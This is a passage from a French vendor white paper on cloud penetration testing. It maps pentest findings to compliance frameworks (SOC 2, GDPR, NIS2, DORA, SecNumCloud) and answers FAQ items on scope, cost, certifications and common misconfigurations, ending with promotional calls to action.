Le pentest cloud contribue a la preparation et a la validation des controles SOC 2. Le critere de sécurité (Common Criteria) est directement adresse par le pentest, qui evalue la robustesse des mécanismes de controle d'acces, la détection des vulnérabilités et l'efficacite de la surveillance. Les findings du pentest alimentent l'evaluation des risques requise par SOC 2 et demontrent la diligence de l'organisation en matière de tests de sécurité.

Les controles SOC 2 spécifiques au cloud incluent : la gestion des acces aux consoles d'administration cloud, le chiffrement des donnees au repos et en transit, la configuration des pare-feu et des groupes de sécurité, la journalisation et la surveillance des événements de sécurité, la gestion des vulnérabilités et les tests d'intrusion reguliers, la gestion des incidents de sécurité et les procedures de reponse, et la gestion des changements dans l'infrastructure cloud.

9.4 Reglementations europeennes et cloud souverain

Les reglementations europeennes imposent des exigences spécifiques pour les donnees hebergees dans le cloud. Le RGPD (Reglement General sur la Protection des Donnees) exige des mesures techniques et organisationnelles appropriees pour protéger les donnees personnelles, incluant le chiffrement, la pseudonymisation et la capacité de restaurer la disponibilite des donnees. Le pentest cloud contribue a valider ces mesures techniques.

La directive NIS2 (Network and Information Security 2), entree en application en octobre 2024, impose aux entites essentielles et importantes des obligations renforcees en matière de cybersécurité, incluant l'evaluation reguliere des risques, les tests d'intrusion et la gestion des vulnérabilités. Les organisations operant dans les secteurs concernes (énergie, transport, sante, finance, infrastructure numerique) doivent demontrer la realisation de tests de sécurité reguliers sur leur infrastructure cloud.

Le reglement DORA (Digital Operational Resilience Act), applicable au secteur financier europeen depuis janvier 2025, impose des exigences spécifiques en matière de tests de resilience numerique, incluant les tests d'intrusion bases sur les menaces (TLPT, Threat-Led Penetration Testing). Ces tests doivent couvrir l'infrastructure cloud utilisee par les entites financieres et etre realises par des testeurs qualifies selon des scenarios de menace realistes.

En France, la qualification SecNumCloud de l'ANSSI definit des exigences de sécurité pour les prestataires de services cloud. Le referentiel SecNumCloud v3.2 impose des mesures techniques detaillees couvrant la gestion des identites, le chiffrement, la journalisation, la détection des intrusions et la souverainete des donnees (hebergement et exploitation sur le territoire europeen). Le pentest des services qualifies SecNumCloud doit verifier la conformité a ces exigences spécifiques.

ReferentielPerimetreFrequence d'audit recommandeeContribution du pentest
CIS BenchmarksConfiguration techniqueTrimestrielle (automatise)Validation des controles techniques
CSA CCM v4Sécurité cloud globaleAnnuelleVerification de 6 domaines sur 17
SOC 2 Type IITrust Service CriteriaAnnuelle (12 mois)Evaluation du critere sécurité
ISO 27017Sécurité cloud (extension 27001)Annuelle + surveillanceVerification des controles spécifiques cloud
RGPDDonnees personnellesContinue + audit periodiqueValidation des mesures techniques
NIS2Entites essentielles/importantesReguliere (non specifiee)Test d'intrusion obligatoire
DORASecteur financierTriennale (TLPT)TLPT incluant le cloud
SecNumCloudCSP qualifiesTriennale + surveillanceVerification du referentiel technique

9.5 Integration du pentest dans le cycle de conformite

Le pentest cloud ne doit pas etre un exercice isole mais s'integrer dans un cycle de conformité continu. L'approche recommandee combine des scans automatises frequents (Prowler, ScoutSuite executes quotidiennement ou hebdomadairement via des pipelines CI/CD), des audits de configuration approfondis trimestriels, et des pentests manuels annuels ou bi-annuels realises par des experts externes.

L'automatisation des controles de conformité via des pipelines CI/CD permet de détecter les regressions de sécurité en temps reel. L'integration de Prowler ou Checkov dans le pipeline de déploiement Terraform bloque automatiquement les deployments introduisant des mauvaises configurations. Les politiques as code (AWS Config Rules, Azure Policy, GCP Organization Policies) appliquent les contraintes de conformité de maniere preventive plutot que detective.

Le rapport de pentest doit explicitement mapper les findings aux referentiels de conformité applicables. Un bucket S3 public sera référence comme un ecart par rapport au controle CIS AWS 2.1.1, au controle CCM DSP-04 et au critere de sécurité SOC 2 CC6.1. Ce mapping facilite la communication avec les équipes de gouvernance et de conformite, et accelere la priorisation des remediations en fonction des obligations reglementaires.

Outils et Ressources Pentest Cloud

Decouvrez nos outils open source et modeles d''IA developpes pour les professionnels de la cybersécurité :

Outil / RessourceDescriptionLien
Awesome Cybersecurity ToolsCollection curatee d''outils de cybersécurité pour le pentest, la forensics et la defenseVoir sur GitHub
AzureArcAgentCheckerOutil de verification et d''audit des agents Azure Arc deployes dans votre infrastructureVoir sur GitHub
TcpPortFuzzerFuzzer de ports TCP pour identifier les services vulnerables et les configurations non securiseesVoir sur GitHub
Bug Bounty Pentest ExplorerEspace interactif pour explorer les techniques de pentest et méthodologies de bug bountyVoir sur HuggingFace
WFPFilterInspectorInspecteur des filtres Windows Filtering Platform pour l''analyse réseau avanceeVoir sur GitHub

Tous ces outils sont disponibles en open source sur notre profil GitHub et nos modeles d''IA sur notre espace HuggingFace. N''hesitez pas a contribuer et a signaler les issues.

Méthodologie de pentest cloud multi-provider

  • Enumeration des services exposes et des permissions IAM
  • Test des configurations S3, Blob Storage et GCS
  • Analyse des metadata services (IMDS) pour l'escalade de privileges
  • Verification des politiques réseau et des security groups
  • Audit des secrets dans les variables d'environnement et les vaults

Chapitre 10 : Questions Frequentes

FAQ - Pentest Cloud Q1 : Faut-il prevenir le fournisseur cloud ? Q2 : Quelle est la duree typique d'un pentest cloud ? Q3 : Pentest en boite noire, grise ou blanche ? Q4 : Quelles certifications pour un pentester cloud ? Q5 : Comment gérer les environnements multi-cloud ? Q6 : Quel est le cout d'un pentest cloud ?
Faut-il prevenir le fournisseur cloud avant de realiser un pentest ?

La réponse depend du fournisseur. AWS ne requiert plus de notification prealable pour la plupart des tests d'intrusion depuis 2023, tant que les tests se limitent aux ressources dont vous etes proprietaire et n'incluent pas des activites interdites (DDoS, DNS zone walking, flooding). Microsoft Azure autorise les tests sans notification prealable a condition de respecter les Microsoft Cloud Penetration Testing Rules of Engagement publiees sur leur site. Google Cloud Platform autorise également les tests sans notification prealable sur vos propres ressources. Cependant, il est fortement recommande de documenter formellement le perimetre et les dates de test, et de disposer d'une autorisation ecrite du proprietaire du compte cloud. Certaines activites spécifiques (test de DDoS, ingenierie sociale des équipes du fournisseur) restent interdites chez tous les fournisseurs.

Quelle est la duree typique d'un pentest cloud et quels facteurs influencent le planning ?

La duree d'un pentest cloud varie considerablement en fonction du perimetre. Un audit de sécurité d'un compte AWS unique avec une dizaine de services peut etre realise en 5 a 10 jours. Un pentest complet d'un environnement multi-compte (AWS Organizations avec 10+ comptes) nécessite 15 a 25 jours. Un audit multi-cloud (AWS + Azure + GCP) requiert 20 a 40 jours selon la taille de l'infrastructure. Les facteurs influencant la duree incluent : le nombre de comptes/abonnements/projets dans le scope, le nombre et la diversite des services utilises, le niveau d'acces fourni (boite noire vs boite blanche), la complexite des architectures (microservices, multi-region, hybrid cloud), et les exigences de reporting (rapport technique seul ou rapport technique + rapport executif + presentation). Prevoyez également 3 a 5 jours supplementaires pour la redaction du rapport.

Quel mode de test choisir : boite noire, grise ou blanche ?

En contexte cloud, le mode boite blanche (acces complet en lecture aux configurations) est généralement le plus efficace et le plus recommande. Contrairement au pentest réseau traditionnel ou le mode boite noire simule un attaquant externe realiste, le pentest cloud en boite noire est souvent peu productif car la surface d'attaque visible de l'exterieur est limitee (les consoles d'administration cloud sont protegees par le fournisseur). Le mode boite grise, avec des credentials d'utilisateur standard, est le meilleur compromis : il simule un attaquant ayant obtenu un acces initial (insider malveillant, credentials volees via phishing) et permet d'evaluer les chemins d'escalade de privileges. Le mode boite blanche est ideal pour un audit de configuration exhaustif et maximise le nombre de findings par jour de test. La combinaison d'une phase boite grise (escalade de privileges) suivie d'une phase boite blanche (audit de configuration) offre la couverture la plus complete.

Quelles certifications sont recommandees pour un pentester cloud ?

Les certifications les plus reconnues pour le pentest cloud incluent : la certification AWS Certified Security - Specialty pour la maitrise des mécanismes de sécurité AWS, la certification AZ-500 Microsoft Azure Security Technologies pour Azure, la certification Google Professional Cloud Security Engineer pour GCP, et la certification CCSP (Certified Cloud Security Professional) de l'ISC2 pour une vision transversale. Pour les competences offensives spécifiques, la certification OSCP (Offensive Security Certified Professional) reste la référence en pentest general, completee par la CARTE (Certified Azure Red Team Expert) de Pentester Academy pour Azure et la CPSA/CRT (Crest Practitioner/Registered) pour les pentesters au Royaume-Uni. La certification CCSK (Certificate of Cloud Security Knowledge) de la CSA constitue une bonne entree en matière pour les professionnels de la sécurité souhaitant se specialiser dans le cloud. Au-dela des certifications, l'experience pratique sur des laboratoires cloud (CloudGoat, AzureGoat, GCPGoat, DVCA) est indispensable.

Comment gérer efficacement un pentest sur un environnement multi-cloud ?

Le pentest multi-cloud requiert une approche structuree en trois temps. Premierement, cartographiez l'ensemble des comptes cloud, des services utilises et des interconnexions entre les fournisseurs (VPN site-a-site, peering, federations d'identite). Deuxiemement, evaluez chaque fournisseur individuellement en utilisant les outils et les techniques spécifiques a chacun (Pacu pour AWS, ROADtools pour Azure, gcp_enum pour GCP). Troisiemement, evaluez les interactions et les relations de confiance entre les fournisseurs : federation d'identite cross-cloud, flux de donnees inter-cloud, replication de donnees, et mécanismes de basculement (failover). Les outils multi-cloud comme ScoutSuite et Prowler permettent de couvrir les trois fournisseurs avec un processus unifie. Attention aux risques spécifiques au multi-cloud : les credentials d'un fournisseur stockees dans un service d'un autre fournisseur (par exemple, des cles AWS dans un Azure Key Vault) creent des chemins d'attaque cross-cloud. Le rapport final doit presenter une vue consolidee des risques avec un focus sur les interactions inter-cloud.

Quel est le cout d'un pentest cloud et comment le justifier aupres de la direction ?

Le cout d'un pentest cloud varie de 10 000 euros pour un audit de base d'un compte unique a plus de 100 000 euros pour un engagement multi-cloud complet avec red team. Les tarifs journaliers des pentesters cloud specialises oscillent entre 1 200 et 2 500 euros selon l'experience et la certification. Pour justifier cet investissement aupres de la direction, presentez le rapport cout-benefice : le cout moyen d'une violation de donnees cloud est de 4,88 millions de dollars (IBM 2024), soit un retour sur investissement considerable si le pentest permet de prevenir un seul incident. Les exigences reglementaires (NIS2, DORA, RGPD) imposant des tests reguliers, le pentest cloud n'est plus optionnel pour de nombreuses organisations. Enfin, les assurances cyber exigent de plus en plus la demonstration de tests d'intrusion reguliers comme condition de couverture ou pour obtenir des primes reduites.

Comment preparer son environnement cloud pour faciliter le pentest ?

Pour optimiser l'efficacite du pentest cloud, plusieurs preparations sont recommandees. Creez un compte IAM dedie au pentester avec des permissions en lecture seule sur l'ensemble des services (politique ReadOnlyAccess sur AWS, role Reader sur Azure, role Viewer sur GCP) plus des permissions spécifiques pour les tests actifs. Documentez l'architecture cloud de maniere synthetique : liste des comptes/abonnements/projets, services principaux utilises, diagramme d'architecture réseau, et flux de donnees critiques. Assurez-vous que la journalisation est active (CloudTrail, Azure Monitor, Cloud Audit Logs) pour permettre la tracabilite des actions du pentester. Identifiez les environnements sensibles ou les tests actifs sont interdits (bases de donnees de production contenant des donnees reelles, services critiques a haute disponibilite). Enfin, designez un point de contact technique disponible pendant toute la duree du test pour repondre aux questions et valider les operations potentiellement impactantes.

Quelles sont les erreurs les plus courantes decouvertes lors des pentests cloud ?

Les findings les plus frequents lors des pentests cloud, tous fournisseurs confondus, sont les suivants par ordre de frequence : (1) Permissions IAM excessives, en particulier l'utilisation de politiques administratives larges au lieu de permissions granulaires (retrouve dans 85% des audits). (2) Absence de MFA sur les comptes privilegies (70% des audits). (3) Credentials longue duree non rotees : cles d'acces AWS de plus de 90 jours, secrets Azure AD sans date d'expiration (65%). (4) Ressources de stockage exposees publiquement ou avec des permissions trop larges (55%). (5) Journalisation incomplete ou desactivee sur certains services ou certaines regions (50%). (6) Secrets stockes en clair dans les variables d'environnement, le code source ou les paramètres d'application (45%). (7) Groupes de sécurité autorisant l'acces entrant depuis 0.0.0.0/0 sur des ports sensibles (40%). (8) Absence de chiffrement des donnees au repos sur les services de stockage et les bases de donnees (35%). Ces findings recurrents illustrent que les vulnérabilités cloud sont majoritairement liees a des erreurs de configuration plutot qu'a des failles techniques complexes.

Conclusion : le pentest cloud, un investissement strategique

Le pentest cloud est bien plus qu'un exercice technique ponctuel. C'est un investissement strategique dans la resilience numerique de l'organisation. En combinant une méthodologie rigoureuse, des outils specialises et une expertise approfondie des trois hyperscalers, le pentest cloud revele les vulnérabilités que les outils automatises ne detectent pas et demontre l'impact concret des mauvaises configurations. Integre dans un cycle de conformité continu, il contribue a maintenir une posture de sécurité robuste face a l'evolution constante des menaces et des services cloud. Les organisations qui investissent dans des pentests cloud reguliers reduisent significativement leur exposition aux risques et renforcent la confiance de leurs clients, partenaires et regulateurs.

Besoin d'un pentest cloud pour votre infrastructure ?

Nos experts certifies AWS, Azure et GCP realisent des audits de sécurité approfondis de vos environnements cloud. De la reconnaissance a la remediation, nous vous accompagnons pour renforcer votre posture de sécurité.

Questions Frequentes

Comment securiser les fonctions serverless contre les attaques par injection ?

La sécurisation des fonctions serverless contre les injections passe par la validation stricte de toutes les entrees utilisateur, l'utilisation de requetes parametrees pour les acces aux bases de donnees, la limitation des permissions IAM au strict minimum nécessaire (principe du moindre privilege), la mise en place de WAF devant les API Gateways, et le monitoring des invocations anormales. Appliquez également le chiffrement des variables d'environnement contenant des secrets et utilisez des couches de sécurité comme AWS Lambda Layers pour centraliser les controles de validation.

Quelle est la méthodologie PTES adaptee au cloud computing ?

La méthodologie PTES (Penetration Testing Execution Standard) adaptee au cloud comprend sept phases : la definition du perimetre et des autorisations du provider, la collecte de renseignements sur l'infrastructure cloud cible, la modelisation des menaces spécifiques au cloud (mauvaise configuration IAM, exposition de stockage, lateral movement inter-services), l'analyse des vulnérabilités des services manages, l'exploitation des failles identifie

Pour approfondir, consultez les ressources de NIST Cybersecurity et de NVD (National Vulnerability Database).

Sources et références : ANSSI · CERT-FR

Conclusion et Recommandations

Ce livre blanc a présente une vue d'ensemble complete des methodologies, outils et bonnes pratiques essentiels. La mise en oeuvre progressive des recommandations detaillees permettra de renforcer significativement la posture de sécurité de votre organisation.

Demander un audit de sécurité cloud

Article suivant recommandé

Sécurité DevSecOps : Intégrer la Sécurité dans le CI/CD →

Guide DevSecOps complet : integration de la sécurité dans le CI/CD, SAST, SCA, DAST, sécurité des conteneurs et Infrastr

Découvrez mon dataset

pentest-checklist-fr

Dataset checklist pentest bilingue FR/EN

Voir →

Surface d'attaque : Ensemble des points d'entrée exploitables par un attaquant pour compromettre un système, incluant les services exposés, les interfaces utilisateur et les API.

Besoin d'un accompagnement expert ?
Audit, conseil, formation — devis personnalisé sous 24h.